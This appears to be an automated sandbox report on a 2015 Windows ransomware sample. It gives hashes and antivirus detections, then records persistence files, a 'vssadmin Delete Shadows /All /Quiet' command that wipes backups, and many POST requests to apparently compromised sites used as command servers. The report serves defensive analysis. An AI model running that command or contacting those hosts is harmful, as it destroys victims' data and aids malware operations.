Analysis Date2015-10-05 07:48:31
MD5f892b07591a50f755c15e45e0b39a835
SHA1400c6ae5f052d51663e3b3c89be24d530656e8ca

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 83ebf5c11e7ab01903916461f212a125 sha1: b0f5c7c2b3c19edbaaa4f4d2611a81512f96fdd1 size: 138240
Section.rdata md5: 46f744fe3d283eece66c09331dc02845 sha1: ebb87dc688c7c130ab2eba84664578beb95d646b size: 12288
Section.data md5: 37cac6f7c29fdc54e43f40f40f63979f sha1: 792643304be4bdb71b2004070c481b878febcd15 size: 25600
Section.rsrc md5: ed0550e91f022c1bab9621dfb794878f sha1: e925dbd4e9b1e196ed6aea60c3e126ea25f3200f size: 94720
Timestamp2015-09-17 08:32:55
PackerMicrosoft Visual C++ ?.?
PEhash810f59f62996622ea92b2dea1bd42cf29f8fac1e
IMPhashd923ac30ec7bd69824538354f5bc31e7
AVRisingno_virus
AVMcafeeno_virus
AVAvira (antivir)no_virus
AVTwisterno_virus
AVAd-AwareGen:Variant.Zusy.162361
AVAlwil (avast)no_virus
AVEset (nod32)Win32/Kryptik.DYCV
AVGrisoft (avg)Crypt_r.TI
AVSymantecno_virus
AVFortinetW32/Injector.CIUZ!tr
AVBitDefenderGen:Variant.Zusy.162361
AVK7Trojan ( 004ce5441 )
AVMicrosoft Security EssentialsWorm:Win32/Gamarue.AU
AVMicroWorld (escan)Gen:Variant.Zusy.162361
AVMalwareBytesRansom.Winlock
AVAuthentiumW32/Agent.XL.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusno_virus
AVEmsisoftGen:Variant.Zusy.162361
AVZillya!no_virus
AVKasperskyTrojan-Ransom.Win32.Cryptodef.yun
AVTrend Microno_virus
AVCAT (quickheal)no_virus
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Zusy.162361
AVArcabit (arcavir)Gen:Variant.Zusy.162361
AVClamAVno_virus
AVDr. WebTrojan.DownLoader16.31313
AVF-SecureGen:Variant.Zusy.162361
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates FileC:\6ff06165\6ff06165.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Processvssadmin.exe Delete Shadows /All /Quiet
Creates Process-k netsvcs

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSeugeniobonato.com
Winsock DNSevolvingcareers.co.uk
Winsock DNSglamkey.com
Winsock DNSeshraqatee.com
Winsock DNSfundmymission.org
Winsock DNSfocusmusicktv.com
Winsock DNShhydrovac.ca
Winsock DNSfan-out.com
Winsock DNScurlmyip.com
Winsock DNSgosmarttec.com
Winsock DNSeffectpublications.com
Winsock DNSdr4greatsmiles.com
Winsock DNSfoundersomaha.net
Winsock DNSgeopowercables.com
Winsock DNSfabconcepts.net
Winsock DNSeastriverpartners.org
Winsock DNSmyexternalip.com
Winsock DNSerointernet.com
Winsock DNSftpsecurityservices.com
Winsock DNSelitefitnessproduct.com
Winsock DNSdoodkonijn.com
Winsock DNSfiiwin.com
Winsock DNSepslegal.co.uk
Winsock DNSfenonsilver.com
Winsock DNSip-addr.es
Winsock DNSentriflex.com
Winsock DNSenyinnaerengwa.com
Winsock DNSfortunesolutions.co.in
Winsock DNSewineco.com
Winsock DNSeurope-academy.net
Winsock DNSexternalbatterycase.com
Winsock DNSdrsrusso.com
Winsock DNSgeorgiainjurycenters.com
Winsock DNSfreepolyclinic.com
Winsock DNSessayspro.com
Winsock DNSemployance.com
Winsock DNSdulichmuadong.com
Winsock DNSg6securitysystems.com
Winsock DNSforwriteabouteverything.com
Winsock DNSgiorgioparquettes.com
Winsock DNSemceebook.com
Winsock DNShagginhosp.com
Winsock DNSeliasgreencondo.com
Winsock DNSh3inmotion.com
Winsock DNSfontainebleau-miami.com
Winsock DNSfondazioneciampi.org
Winsock DNSdrrebeccafountain.com
Winsock DNShanjou-kanban.net
Winsock DNSgembeauty.net
Winsock DNSfiftyschmifty.com
Winsock DNSggal.com.ng
Winsock DNSgreenevap.com
Winsock DNSessayhub.org
Winsock DNSgaiga.net

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSip-addr.es
Type: A
188.165.164.184
DNSmyexternalip.com
Type: A
78.47.139.102
DNScurlmyip.com
Type: A
184.106.112.172
DNSeffectpublications.com
Type: A
166.62.12.1
DNSglamkey.com
Type: A
23.229.142.166
DNSgiorgioparquettes.com
Type: A
107.180.1.233
DNSfiiwin.com
Type: A
192.254.189.83
DNSeliasgreencondo.com
Type: A
23.229.143.32
DNSfiftyschmifty.com
Type: A
66.33.213.135
DNShagginhosp.com
Type: A
184.168.26.1
DNSfreepolyclinic.com
Type: A
166.62.28.84
DNSfabconcepts.net
Type: A
107.180.4.133
DNSevolvingcareers.co.uk
Type: A
188.121.47.1
DNSenyinnaerengwa.com
Type: A
50.63.90.1
DNSerointernet.com
Type: A
68.178.254.208
DNSfondazioneciampi.org
Type: A
66.36.163.207
DNSfortunesolutions.co.in
Type: A
103.21.58.231
DNSemceebook.com
Type: A
23.229.183.231
DNSggal.com.ng
Type: A
52.88.9.255
DNSentriflex.com
Type: A
52.88.9.255
DNSfenonsilver.com
Type: A
192.232.249.212
DNSdoodkonijn.com
Type: A
46.252.201.1
DNSfan-out.com
Type: A
50.62.245.1
DNShhydrovac.ca
Type: A
50.63.202.57
DNSgaiga.net
Type: A
186.202.153.84
DNSemployance.com
Type: A
173.201.1.1
DNShanjou-kanban.net
Type: A
157.7.144.5
DNSepslegal.co.uk
Type: A
188.121.47.1
DNSgembeauty.net
Type: A
85.92.75.157
DNSessayspro.com
Type: A
74.124.204.146
DNSgeopowercables.com
Type: A
107.180.44.125
DNSg6securitysystems.com
Type: A
188.121.47.1
DNSeurope-academy.net
Type: A
217.174.149.3
DNSeugeniobonato.com
Type: A
95.110.202.149
DNSdr4greatsmiles.com
Type: A
173.254.28.111
DNSeastriverpartners.org
Type: A
50.62.160.231
DNSessayhub.org
Type: A
74.124.204.146
DNSexternalbatterycase.com
Type: A
192.186.222.229
DNSdrrebeccafountain.com
Type: A
184.168.25.1
DNSfundmymission.org
Type: A
184.168.221.44
DNSh3inmotion.com
Type: A
182.50.135.128
DNSdulichmuadong.com
Type: A
182.50.134.1
DNSfontainebleau-miami.com
Type: A
68.178.254.208
DNSeshraqatee.com
Type: A
107.180.4.26
DNSgreenevap.com
Type: A
50.63.95.1
DNSelitefitnessproduct.com
Type: A
192.186.222.229
DNSdrsrusso.com
Type: A
97.74.215.85
DNSewineco.com
Type: A
192.186.235.6
DNSfoundersomaha.net
Type: A
50.63.42.1
DNSfocusmusicktv.com
Type: A
23.229.209.230
DNSgosmarttec.com
Type: A
192.232.249.212
DNSgeorgiainjurycenters.com
Type: A
184.168.19.1
DNSforwriteabouteverything.com
Type: A
107.180.2.132
DNSftpsecurityservices.com
Type: A
107.180.26.90
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://effectpublications.com/wp-includes/theme-compat/ap1.php?f=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://glamkey.com/errors/default/css/ap2.php?d=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://giorgioparquettes.com/wp-content/uploads/2014/07/ap3.php?q=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fiiwin.com/wp-admin/maint/ap4.php?j=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eliasgreencondo.com/wp-content/cache/ap4.php?z=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fiftyschmifty.com/ap1.php?q=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?f=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://freepolyclinic.com/gallery/small/ap1.php?a=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?x=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?p=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://enyinnaerengwa.com/user/most-instagram-followers-non-celebrity/ap3.php?g=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://erointernet.com/ap2.php?q=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fondazioneciampi.org/nuovo/blogs/media/ap2.php?q=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fortunesolutions.co.in/wp-content/plugins/tinymce-advanced/css/ap5.php?m=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://emceebook.com/bat/ap1.php?v=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ggal.com.ng/js/vendor/ap5.php?c=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://entriflex.com/ndst.ng/wp-admin/images/ap5.php?x=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fenonsilver.com/controller/catalog/ap2.php?r=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://doodkonijn.com/wp-includes/theme-compat/ap1.php?q=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fan-out.com/wp-includes/fonts/ap5.php?h=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hhydrovac.ca/ap1.php?i=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gaiga.net/wp-admin/js/ap3.php?d=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://employance.com/wp-includes/theme-compat/ap2.php?j=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hanjou-kanban.net/wordpress/wp-content/plugins/akismet/_inc/img/ap2.php?o=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://epslegal.co.uk/js-js/ap4.php?l=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gembeauty.net/wp-includes/certificates/ap2.php?f=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://essayspro.com/css/fonts/ap4.php?a=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://geopowercables.com/wp-admin/user/ap1.php?n=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://g6securitysystems.com/js/ap4.php?u=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://europe-academy.net/wp-admin/user/ap2.php?i=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eugeniobonato.com/wp-content/uploads/js_composer/ap3.php?v=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dr4greatsmiles.com/old/wp-includes/theme-compat/ap3.php?e=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eastriverpartners.org/wp-includes/theme-compat/ap5.php?l=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://essayhub.org/css/fonts/ap5.php?c=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://externalbatterycase.com/wp-admin/js/ap4.php?q=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://drrebeccafountain.com/Saffron/wp-content/themes/medica-lite/ap5.php?p=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fundmymission.org/wp-includes/theme-compat/ap5.php?s=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://h3inmotion.com/ap4.php?c=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dulichmuadong.com/wp-includes/fonts/ap2.php?m=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fontainebleau-miami.com/ap1.php?i=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eshraqatee.com/wp-includes/css/ap1.php?c=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://greenevap.com/mtqzpa/templates/ap5.php?u=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://elitefitnessproduct.com/wp-admin/js/ap3.php?w=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://drsrusso.com/mtqzpa/templates/ap4.php?h=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ewineco.com/wp-admin/network/ap5.php?n=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?f=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://focusmusicktv.com/ap3.php?l=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gosmarttec.com/assets/fonts/ap1.php?d=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?j=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://forwriteabouteverything.com/wp-includes/pomo/ap4.php?s=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ftpsecurityservices.com/wp-admin/images/ap2.php?k=ri641i2oi582f1g
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://effectpublications.com/wp-includes/theme-compat/ap1.php?m=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://glamkey.com/errors/default/css/ap2.php?t=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://giorgioparquettes.com/wp-content/uploads/2014/07/ap3.php?w=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fiiwin.com/wp-admin/maint/ap4.php?t=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eliasgreencondo.com/wp-content/cache/ap4.php?o=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fiftyschmifty.com/ap1.php?q=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?a=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://freepolyclinic.com/gallery/small/ap1.php?s=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?z=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?q=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://enyinnaerengwa.com/user/most-instagram-followers-non-celebrity/ap3.php?k=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://erointernet.com/ap2.php?n=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fondazioneciampi.org/nuovo/blogs/media/ap2.php?g=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fortunesolutions.co.in/wp-content/plugins/tinymce-advanced/css/ap5.php?o=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://emceebook.com/bat/ap1.php?f=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ggal.com.ng/js/vendor/ap5.php?y=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://entriflex.com/ndst.ng/wp-admin/images/ap5.php?w=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fenonsilver.com/controller/catalog/ap2.php?d=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://doodkonijn.com/wp-includes/theme-compat/ap1.php?f=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fan-out.com/wp-includes/fonts/ap5.php?q=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hhydrovac.ca/ap1.php?c=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gaiga.net/wp-admin/js/ap3.php?b=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://employance.com/wp-includes/theme-compat/ap2.php?r=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hanjou-kanban.net/wordpress/wp-content/plugins/akismet/_inc/img/ap2.php?r=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://epslegal.co.uk/js-js/ap4.php?d=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gembeauty.net/wp-includes/certificates/ap2.php?p=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://essayspro.com/css/fonts/ap4.php?i=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://geopowercables.com/wp-admin/user/ap1.php?z=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://g6securitysystems.com/js/ap4.php?o=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://europe-academy.net/wp-admin/user/ap2.php?i=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eugeniobonato.com/wp-content/uploads/js_composer/ap3.php?f=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dr4greatsmiles.com/old/wp-includes/theme-compat/ap3.php?o=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eastriverpartners.org/wp-includes/theme-compat/ap5.php?w=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://essayhub.org/css/fonts/ap5.php?b=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://externalbatterycase.com/wp-admin/js/ap4.php?l=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://drrebeccafountain.com/Saffron/wp-content/themes/medica-lite/ap5.php?c=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fundmymission.org/wp-includes/theme-compat/ap5.php?p=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://h3inmotion.com/ap4.php?b=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dulichmuadong.com/wp-includes/fonts/ap2.php?j=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fontainebleau-miami.com/ap1.php?u=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eshraqatee.com/wp-includes/css/ap1.php?d=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://greenevap.com/mtqzpa/templates/ap5.php?l=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://elitefitnessproduct.com/wp-admin/js/ap3.php?n=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://drsrusso.com/mtqzpa/templates/ap4.php?m=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ewineco.com/wp-admin/network/ap5.php?w=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?d=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://focusmusicktv.com/ap3.php?r=a4f8sbgx94
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gosmarttec.com/assets/fonts/ap1.php?y=a4f8sbgx94
